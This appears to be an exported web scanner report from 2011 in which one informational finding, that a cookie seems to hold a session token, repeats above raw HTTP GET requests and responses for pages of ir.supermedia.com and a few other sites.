HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:27 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: comcast.usdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:32:10 GMT Server: Apache/2.0.46 (Red Hat) Accept-Ranges: bytes X-Powered-By: PHP/4.3.2 Set-Cookie: PHPSESSID=3c6d8370b754a2d4c61e45b8e079762f; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18497
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Comcast Cable Deals | Comcast High Speed Internet & Cable TV Promotions</title> <meta name="keywords" content=" ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /category.jspa?categoryID=267 HTTP/1.1 Host: discussions.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Apple - Support - Discussions - iPad</title> <meta htt ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: ir.supermedia.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762069|check#true#1296760269; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:09:40 GMT Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: NOMOBILE=0;path=/ Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:09:40 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:09:40 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:09:40 GMT;path=/ Vary: Accept-Encoding Content-Length: 17691
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /InvestorKit.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A22%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:22 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:22 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:22 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /common/mobile/?CompanyID=VERIZONINFO HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:37:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A37%3A15%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:15 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:15 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:37:15 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactus.cfm HTTP/1.1 Host: ir.supermedia.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NOMOBILE=0; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; mbox=session#1296759528614-838261#1296763633|check#true#1296761833; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:57 GMT Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:57 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:57 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:57 GMT;path=/ Vary: Accept-Encoding Content-Length: 21608
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /disclaimer.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A00%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:00 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:00 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:00 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /downloads.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A22%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:22 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:22 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:22 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /eventdetail.cfm?EventID=92127 HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A17%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:17 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:17 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /events.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:37:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A37%3A18%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:19 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:19 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:37:19 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /faq.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A02%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:02 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:02 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:02 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:35:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A35%3A59%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:35:59 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:35:59 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:35:59 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /releasedetail.cfm?ReleaseID=546698 HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A06%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:06 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:06 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:06 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /releases.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A07%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:07 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:07 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:07 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A03%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:04 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:04 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:04 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rss.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A22%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:23 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:23 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:23 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
